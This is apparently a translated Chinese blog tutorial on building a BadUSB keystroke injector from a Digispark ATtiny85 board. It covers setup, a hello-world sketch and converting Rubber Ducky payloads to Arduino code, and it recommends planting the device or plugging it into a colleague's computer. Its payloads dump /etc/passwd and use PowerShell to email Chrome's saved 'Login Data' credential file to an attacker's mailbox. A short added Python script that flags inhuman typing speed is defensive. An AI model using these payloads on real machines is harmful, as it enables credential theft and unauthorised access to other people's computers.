Building a BadUSB with the Digispark Kickstarter

BadUSB, put simply, is a device that runs a program automatically as soon as it is plugged into someone's USB port. It can be made to look like an ordinary flash drive to lure people, dropped somewhere in an office, or quietly plugged into a colleague's computer while they are out at lunch. A BadUSB emulates keyboard and mouse input (much like a macro tool such as 按键精灵) rather than carrying a specific malicious program, and antivirus software has no way to inspect the instructions written into the BadUSB firmware, so as far as antivirus is concerned it is immune.

The Digispark Kickstarter is based on the ATtiny85 microcontroller. It is not powerful, but it is very cheap (about 7 to 10 RMB), and it works without installing any separate driver on the target computer.

[Image: Digispark.png]

The official Digispark Kickstarter specifications are:

- Support for the Arduino IDE 1.0+ (OSX/Win/Linux)
- Power via USB or External Source - 5v or 7-35v (automatic selection)
- On-board 500ma 5V Regulator
- Built-in USB (and serial debugging)
- 6 I/O Pins (2 are used for USB only if your program actively communicates over USB, otherwise you can use all 6 even if you are programming via USB)
- 8k Flash Memory (about 6k after bootloader)
- I2C and SPI (via USI)
- PWM on 3 pins (more possible with Software PWM)
- ADC on 4 pins
- Power LED and Test/Status LED (on Pin0)

1. Environment setup

A brief record of the installation on Fedora; for other platforms, refer to the official documentation: http://digistump.com/wiki/digispark/tutorials/connecting

Create /etc/udev/rules.d/99-arduino-101.rules with the following content:

# Arduino 101 in DFU Mode

SUBSYSTEM=="tty", ENV{ID_REVISION}=="8087", ENV{ID_MODEL_ID}=="0ab6", MODE="0666", ENV{ID_MM_DEVICE_IGNORE}="1", ENV{ID_MM_CANDIDATE}="0"
SUBSYSTEM=="usb", ATTR{idVendor}=="8087", ATTR{idProduct}=="0aba", MODE="0666", ENV{ID_MM_DEVICE_IGNORE}="1"

Then reload the udev rules:

sudo udevadm control --reload-rules

The system can now read the board. Next, set up the Arduino IDE:

a. File -> Preferences, and add http://digistump.com/package_digistump_index.json under "Additional Boards Manager URLs"

b. Tools -> Board -> Boards Manager, find "Digistump AVR Boards by Digistump" and install it

c. Tools -> Board, select "Digispark (Default - 16.5mhz)"

d. Tools -> Programmer, select "USBtinyISP"

After these few steps the board is ready to be programmed.

2. Hello world

First we need to check that the board works at all and that the environment is configured correctly, so rather than starting with anything complicated, use the official example sketch. Choose File -> Examples -> DigisparkKeyboard. The official example is very simple: it keeps typing "Hello Digispark!":

#include "DigiKeyboard.h"

void setup() {
  // don't need to set anything up to use DigiKeyboard
}

void loop() {
  // this is generally not necessary but with some older systems it seems to
  // prevent missing the first character after a delay:
  DigiKeyboard.sendKeyStroke(0);

  // Type out this string letter by letter on the computer (assumes US-style
  // keyboard)

  DigiKeyboard.println("Hello Digispark!");
  // It's better to use DigiKeyboard.delay() over the regular Arduino delay()
  // if doing keyboard stuff because it keeps talking to the computer to make
  // sure the computer knows the keyboard is alive and connected
  DigiKeyboard.delay(5000);
}

Then choose Sketch -> Upload. When the prompt "Plug in device now... (will timeout in 60 seconds)" appears, plug the Digispark into a USB port. If it succeeds, you will see the following output:

> Please plug in the device ...
> Press CTRL+C to terminate the program.
> Device is found!
connecting: 16% complete
connecting: 22% complete
connecting: 28% complete
connecting: 33% complete
> Device has firmware version 1.6
> Available space for user applications: 6012 bytes
> Suggested sleep time between sending pages: 8ms
> Whole page count: 94  page size: 64
> Erase function sleep duration: 752ms
parsing: 50% complete
> Erasing the memory ...
erasing: 55% complete
erasing: 60% complete
erasing: 65% complete
> Starting to upload ...
writing: 70% complete
writing: 75% complete
writing: 80% complete
> Starting the user app ...
running: 100% complete
>> Micronucleus done. Thank you!

When it is done, open a text editor and watch the system type "Hello Digispark!" over and over, as if by itself.
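Seen from the target machine, the sketch above pushes "Hello Digispark!" out at firmware speed and then sleeps in DigiKeyboard.delay(5000); a person typing the same text leaves tens to hundreds of milliseconds between keys, and that inhuman cadence is the simplest detection handle. The script below is an added example, not code from this page or from the Digispark project: it groups constructed key-event timestamps into bursts and flags the bursts typed faster than a human could (the 30 ms threshold, the burst split and the event format are assumptions).

```python
"""Flag keystroke bursts typed faster than a human could (added example,
not from the page or the Digispark project)."""
from statistics import median

HUMAN_MIN_GAP_S = 0.030  # assumption: a median gap under 30 ms is not human
BURST_GAP_S = 0.500      # a pause longer than this closes a burst
MIN_BURST_LEN = 8        # ignore short bursts (shortcuts, key repeat)


def split_bursts(events):
    """Group (timestamp_s, key) events into bursts separated by long pauses."""
    bursts, current = [], []
    for t, key in sorted(events):
        if current and t - current[-1][0] > BURST_GAP_S:
            bursts.append(current)
            current = []
        current.append((t, key))
    if current:
        bursts.append(current)
    return bursts


def suspicious_bursts(events):
    """Return (text, median_gap_s) for every burst with an inhuman cadence."""
    flagged = []
    for burst in split_bursts(events):
        if len(burst) < MIN_BURST_LEN:
            continue
        gaps = [b[0] - a[0] for a, b in zip(burst, burst[1:])]
        gap = median(gaps)
        if gap < HUMAN_MIN_GAP_S:
            flagged.append(("".join(k for _, k in burst), gap))
    return flagged


def typed(text, start, gap):
    """Constructed key events: `text` typed from `start` with a fixed gap."""
    return [(start + i * gap, ch) for i, ch in enumerate(text)]


# Constructed sample: two firmware-speed bursts 5 s apart, then a human one.
SAMPLE_EVENTS = (
    typed("Hello Digispark!\n", 0.0, 0.002)
    + typed("Hello Digispark!\n", 5.0, 0.002)
    + typed("hello from a human\n", 12.0, 0.150)
)

if __name__ == "__main__":
    for text, gap in suspicious_bursts(SAMPLE_EVENTS):
        print(f"{gap * 1000:.1f} ms/key: {text!r}")
```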

3. Payload

There are many public payloads online. You can of course write your own, but it is worth reading other people's first. Ready-made payloads are available here: https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

You also need the script Duckyspark_translator.py, which converts a payload into actual code: https://github.com/toxydose/Duckyspark

Take "Payload Basic Terminal Commands Ubuntu" (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---Basic-Terminal-Commands-Ubuntu) as an example:

DELAY 3000
ALT F2
DELAY 500
STRING xterm
DELAY 500
ENTER
DELAY 750
STRING pwd
DELAY 500
ENTER
DELAY 300
STRING id
DELAY 300
ENTER
DELAY 500
STRING cat /etc/passwd
DELAY 500
ENTER

Save it as payload.txt, then run:

$ python3 Duckyspark_translator.py payload.txt out

This produces out.ino in the current directory:

//generated by Duckyspark https://github.com/toxydose/Duckyspark

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76
#define KEY_ARROW_RIGHT 0x4F
#define KEY_ARROW_DOWN  0x51
#define KEY_ARROW_UP    0x52

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_F2,MOD_ALT_LEFT | 0);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("xterm"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);
DigiKeyboard.delay(750);
DigiKeyboard.print(F("pwd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);
DigiKeyboard.delay(300);
DigiKeyboard.print(F("id"));
DigiKeyboard.delay(300);
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cat /etc/passwd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);

}

void loop() {

}

Copy the code into an Arduino IDE sketch and upload it to the board.

Payloads are really quite simple: they are just combinations of key presses and typed input tailored to each operating system. On Chinese-language systems, be sure to press Shift before typing commands so that the Chinese input method is switched to English.

The next example, for Windows 10, uses PowerShell to send Chrome's data file to a mailbox:

REM Author: lu4nx
DELAY 1000
GUI r
DELAY 200
SHIFT
DELAY 200
STRING powershell
DELAY 200
ENTER
ENTER
DELAY 1000
ALT y
DELAY 200
SHIFT
DELAY 200
STRING Get-Process -Name Chrome | Stop-Process;
STRING $SMTPServer = 'SMTP服务器地址';
STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 25);
STRING $SMTPInfo.EnableSsl = $true;
STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('帐号', '密码');
STRING $ReportEmail = New-Object System.Net.Mail.MailMessage;$ReportEmail.From = '发件人邮箱';
STRING $ReportEmail.To.Add('收件人邮箱');
STRING $ReportEmail.Subject = 'Chrome';$ReportEmail.Body = ':)';
STRING $ReportEmail.Attachments.Add("${env:LocalAppData}\Google\Chrome\User Data\Default\Login Data");
STRING $SMTPInfo.Send($ReportEmail);
STRING Exit;
ENTER